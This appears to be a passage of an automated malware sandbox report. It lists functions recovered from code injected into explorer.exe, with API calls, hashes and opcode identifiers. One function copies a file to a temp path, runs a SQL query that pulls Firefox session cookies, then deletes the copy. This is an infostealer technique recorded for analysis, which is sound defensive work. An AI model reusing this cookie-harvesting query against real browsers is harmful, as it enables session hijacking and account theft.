                                                                    • Instruction Fuzzy Hash: 25113A73224B85D3EB50DF11F850B9A7365F799305F815527EA8E47A68EB3CD648CB00
                                                                    APIs
                                                                      • Part of subcall function 0E457708: GetTempPathA.KERNEL32 ref: 0E457727
                                                                      • Part of subcall function 0E457708: lstrcatA.KERNEL32 ref: 0E45773D
                                                                      • Part of subcall function 0E457708: lstrlenA.KERNEL32 ref: 0E457746
                                                                      • Part of subcall function 0E457708: wsprintfA.USER32 ref: 0E45788A
                                                                      • Part of subcall function 0E457708: lstrcatA.KERNEL32 ref: 0E4578A0
                                                                      • Part of subcall function 0E457708: lstrlenA.KERNEL32 ref: 0E4578AD
                                                                    • CopyFileA.KERNEL32 ref: 0E455D1B
                                                                    • DeleteFileA.KERNEL32 ref: 0E455D76
                                                                    Strings
                                                                    • SELECT host, path, isSecure, expiry, name, value, isHttpOnly FROM moz_cookies, xrefs: 0E455D53
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.4555139839.000000000E450000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E450000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_e450000_explorer.jbxd
                                                                    Similarity
                                                                    • API ID: Filelstrcatlstrlen$CopyDeletePathTempwsprintf
                                                                    • String ID: SELECT host, path, isSecure, expiry, name, value, isHttpOnly FROM moz_cookies
                                                                    • API String ID: 4185374037-3522861938
                                                                    • Opcode ID: 43d74f6a088fc3e418d3fd097b07d923dc96b3aea07d2a847afad3ca13e99e41
                                                                    • Instruction ID: e12e7702701fc2d805821a7a1dde1062fbea3cb4978fbb4dd85394e75f7dcd0d
                                                                    • Opcode Fuzzy Hash: 43d74f6a088fc3e418d3fd097b07d923dc96b3aea07d2a847afad3ca13e99e41
                                                                    • Instruction Fuzzy Hash: 59017C73334A8992DB61DB62F854BAA6360FBCA745F805427EE4957A18DF2DC908CB40
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.4555139839.000000000E450000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E450000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_e450000_explorer.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 485612231-0
                                                                    • Opcode ID: 8f9486c2b9ac7041e6348180d4699964ef133c4800ab67ee5ca9e89ed9ba18f9
                                                                    • Instruction ID: 8860562e6391a4d33cd0c50666042360724a30d71621443cd9ed552a3eff877b
                                                                    • Opcode Fuzzy Hash: 8f9486c2b9ac7041e6348180d4699964ef133c4800ab67ee5ca9e89ed9ba18f9
                                                                    • Instruction Fuzzy Hash: 63E01261B1168146EF1CABF3D86837A17E16F85F47F84483AC925AB751EE2C8C454340
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.4555139839.000000000E450000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E450000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_e450000_explorer.jbxd
                                                                    Similarity
                                                                    • API ID: AllocHeap
                                                                    • String ID:
                                                                    • API String ID: 4292702814-0
                                                                    • Opcode ID: 558171bcc7c76863372ad7002b378d837f4fc13fab5d06e03d61d6356f178b3d
                                                                    • Instruction ID: 45286eaf795701865ecd9a18c70a56523e2c8f8d9ae32a6df7715b6982f69077
                                                                    • Opcode Fuzzy Hash: 558171bcc7c76863372ad7002b378d837f4fc13fab5d06e03d61d6356f178b3d
                                                                    • Instruction Fuzzy Hash: A1E03961B0664085EE195FA2999037A53905B88FA3F494B2B9D3A87BC0DA6CCC818225